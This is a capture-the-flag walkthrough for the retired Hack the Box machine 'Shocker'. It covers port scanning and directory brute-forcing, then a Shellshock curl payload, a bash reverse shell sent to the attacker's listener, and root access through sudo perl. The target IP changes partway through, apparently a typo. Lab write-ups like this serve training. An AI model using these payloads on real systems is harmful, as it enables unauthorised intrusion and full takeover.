Introduction
This article aims to walk you through Shocker box produced by mrb3n and hosted on Hack the Box. Anyone who has premium access to HTB can try to pwn this box as it is already retired, this is an easy and fun box. The box is also recommended for PEN-200 (OSCP) Students. Hope you enjoy reading the walkthrough!
Reconnaissance
Since we are already provided with IP address of the box, we will scan it via Nmap.
Scanning
We are going to scan the IP for all open ports by typing the following command on our terminal. -Pn argument indicates that if the box does not respond to ICMP, nmap will suppose the box up and all ports pinged.
nmap -Pn 10.10.10.56After waiting for a while, we have got our results as shown below:
To gather further information on ports found by nmap, we will add some more arguments specifying open ports. -sV will scan to show service versions of applications on open ports, and -sC will run default scripts on services in order to check whether there is a vulnerability.
nmap -p 80,2222 10.10.10.56 -sV -sCIn a short while, we have got our results and more details regarding open ports. And we decide to start enumeration on port 80 as other port does not provide us with a broad attack surface as an http server does for this box.
Enumeration
First of all, we type IP address in our browser.
We enumerate web page on port 80, but there is nothing apart from the .jpg file seen in above image.
So, we are going to gobuster web server in order to see if there is a directory to inspect further. We will use -u argument to specify URL and -w argument to provide the wordlist we want to use for directory bruteforcing. And to make bruteforcing process fast, we will specify threads as 30 by -t argument.
gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/common.txt -t 30
We come across /cgi-bin/ directory and as we have seen from nmap scan results that the server is on Apache, and from an educated point of view, it may lead to exploiting the box with shellshock exploit.
Now, we will gobuster /cgi-bin/ directory again with specific extensions to see if there is any script or file present on the web server under /cgi-bin.
gobuster dir -u http://10.10.10.56/cgi-bin/ -x .php,.html,.txt,.sh -w /usr/share/wordlists/dirb/common.txt -t 30
We find user.sh script located in /cgi-bin/ directory. Now it is time to read the script to see if we are able to interact with the server through this script.
Hence, we are able to read the script and exploit the box via shellshock. After googling keywords, we find a way to exploit shellshock manually.
Now, we will try to execute the following command on the box to see if it works.
curl -A "() { :; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://10.10.10.65/cgi-bin/user.sh
It works. It is time to get a low shell on the box.
Exploitation
As we are able to execute commands remotely on the box, we will set up a netcat listener and get a reverse shell.
nc -lvnp 443
We change the id command we tested before to get a reverse bash shall as follows.
curl -A "() { :; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -i >& /dev/tcp/10.10.14.30/443 0>&1" http://10.10.10.65/cgi-bin/user.sh
After typing and executing the command, we check our netcat listener.
And now we have a low shell on the box. It is time to concatenate user.txt.
Privilege Escalation
We enumerate the machine to find weak services and files on the server. Privilege Escalation of this box was very easy, there are some initial enumeration steps for privilege escalation after getting low shell, and the first on tried on this box, which was checking sudo permissions for the current user with sudo -l, was the way for privilege escalation.
The current user shelly is able to execute perl with sudo permissions. We check gtfobins to see how we can escalate our privilege through perl.
Thus, we type the following command and get a root shell on the box.
sudo perl -e 'exec "/bin/sh";'
Now it is time to get root hash on the box.
And we have full authority on the box. Enjoy!
